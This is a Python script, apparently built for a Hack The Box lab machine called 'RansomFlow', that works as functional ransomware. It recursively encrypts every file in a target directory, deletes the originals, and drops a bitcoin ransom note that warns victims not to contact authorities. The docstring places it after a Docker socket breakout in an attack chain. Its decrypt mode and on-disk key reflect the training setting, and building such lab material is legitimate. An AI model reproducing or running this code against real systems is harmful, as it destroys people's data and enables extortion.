#!/usr/bin/env python3
"""
RansomFlow — AI-Generated Ransomware Simulator
HTB Machine: RansomFlow (Medium Linux)
Author: Denis Sanchez Leyva / Vertex Coders LLC

Used in the HTB attack chain:
  Docker socket breakout → mount /host → execute ransom.py → encrypt /data
"""

import os
import sys
import json
import argparse
import hashlib
import base64
from pathlib import Path
from datetime import datetime

try:
    from cryptography.fernet import Fernet
except ImportError:
    print("[!] pip install cryptography")
    sys.exit(1)

RANSOM_NOTE_TEMPLATE = """
╔══════════════════════════════════════════════════════════════════╗
║          ██████╗  █████╗ ███╗   ██╗███████╗ ██████╗ ███╗   ███╗ ║
║          ██╔══██╗██╔══██╗████╗  ██║██╔════╝██╔═══██╗████╗ ████║ ║
║          ██████╔╝███████║██╔██╗ ██║███████╗██║   ██║██╔████╔██║ ║
║          ██╔══██╗██╔══██║██║╚██╗██║╚════██║██║   ██║██║╚██╔╝██║ ║
║          ██║  ██║██║  ██║██║ ╚████║███████║╚██████╔╝██║ ╚═╝ ██║ ║
║          ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝  ╚═══╝╚══════╝ ╚═════╝ ╚═╝     ╚═╝ ║
╠══════════════════════════════════════════════════════════════════╣
║         YOUR FILES HAVE BEEN ENCRYPTED BY RANSOMFLOW AI          ║
╚══════════════════════════════════════════════════════════════════╝

[AI-GENERATED RANSOM NOTE — {timestamp}]

Your critical business data has been encrypted using military-grade
AES-256 encryption. The AI model determined your files have an
estimated value of: {ransom_amount}

FILES ENCRYPTED: {file_count}
UNIQUE ID: {unique_id}

TO RECOVER YOUR FILES:
  1. Transfer {ransom_amount} to: bc1qransomflow2026vertex
  2. Email proof to: recover@ransomflow.htb
  3. You will receive decryption key within 24h

KEY FILE LOCATION: {key_file}

DO NOT:
  ✗ Rename encrypted files
  ✗ Attempt to decrypt without the key
  ✗ Contact authorities (we will know)

This message was generated by RansomFlow AI v1.0
Powered by local LLM inference — Vertex Coders LLC
"""


def generate_key() -> bytes:
    return Fernet.generate_key()


def encrypt_file(path: Path, fernet: Fernet) -> bool:
    try:
        data = path.read_bytes()
        encrypted = fernet.encrypt(data)
        enc_path = path.with_suffix(path.suffix + '.ransomflow')
        enc_path.write_bytes(encrypted)
        path.unlink()  # Remove original
        return True
    except Exception as e:
        print(f"  [!] Failed: {path} — {e}")
        return False


def decrypt_file(path: Path, fernet: Fernet) -> bool:
    try:
        data = path.read_bytes()
        decrypted = fernet.decrypt(data)
        original = Path(str(path).replace('.ransomflow', ''))
        original.write_bytes(decrypted)
        path.unlink()
        return True
    except Exception as e:
        print(f"  [!] Failed: {path} — {e}")
        return False


def main():
    parser = argparse.ArgumentParser(description='RansomFlow Simulator')
    parser.add_argument('--target', required=True, help='Directory to encrypt')
    parser.add_argument('--key-file', required=True, help='Path to save/load key')
    parser.add_argument('--decrypt', action='store_true', help='Decrypt mode')
    parser.add_argument('--ransom', default='0.5 BTC', help='Ransom amount for note')
    parser.add_argument('--dry-run', action='store_true', help='Preview only')
    args = parser.parse_args()

    target = Path(args.target)
    key_file = Path(args.key_file)

    if not target.exists():
        print(f"[!] Target not found: {target}")
        sys.exit(1)

    if args.decrypt:
        # Decrypt mode
        if not key_file.exists():
            print(f"[!] Key file not found: {key_file}")
            sys.exit(1)
        key = key_file.read_bytes()
        fernet = Fernet(key)
        encrypted = list(target.rglob('*.ransomflow'))
        print(f"[*] Decrypting {len(encrypted)} files...")
        ok = sum(1 for f in encrypted if decrypt_file(f, fernet))
        print(f"[+] Decrypted {ok}/{len(encrypted)} files")
        return

    # Encrypt mode
    key = generate_key()
    fernet = Fernet(key)

    files = [f for f in target.rglob('*') if f.is_file() and not str(f).endswith('.ransomflow')]
    print(f"[*] RansomFlow Simulator — Target: {target}")
    print(f"[*] Files found: {len(files)}")

    if args.dry_run:
        for f in files:
            print(f"  [DRY] Would encrypt: {f}")
        return

    # Save key first
    key_file.parent.mkdir(parents=True, exist_ok=True)
    key_file.write_bytes(key)
    print(f"[+] Key saved to: {key_file}")

    ok = 0
    for f in files:
        print(f"  [ENC] {f}")
        if encrypt_file(f, fernet):
            ok += 1

    unique_id = hashlib.sha256(key).hexdigest()[:16].upper()

    # Generate ransom note
    note = RANSOM_NOTE_TEMPLATE.format(
        timestamp=datetime.now().isoformat(),
        ransom_amount=args.ransom,
        file_count=ok,
        unique_id=unique_id,
        key_file=str(key_file),
    )

    note_path = target / 'READ_ME_NOW.txt'
    note_path.write_text(note)

    print(f"\n[+] Encrypted {ok}/{len(files)} files")
    print(f"[+] Ransom note: {note_path}")
    print(f"[+] Unique ID: {unique_id}")
    print(f"\n{note}")


if __name__ == '__main__':
    main()
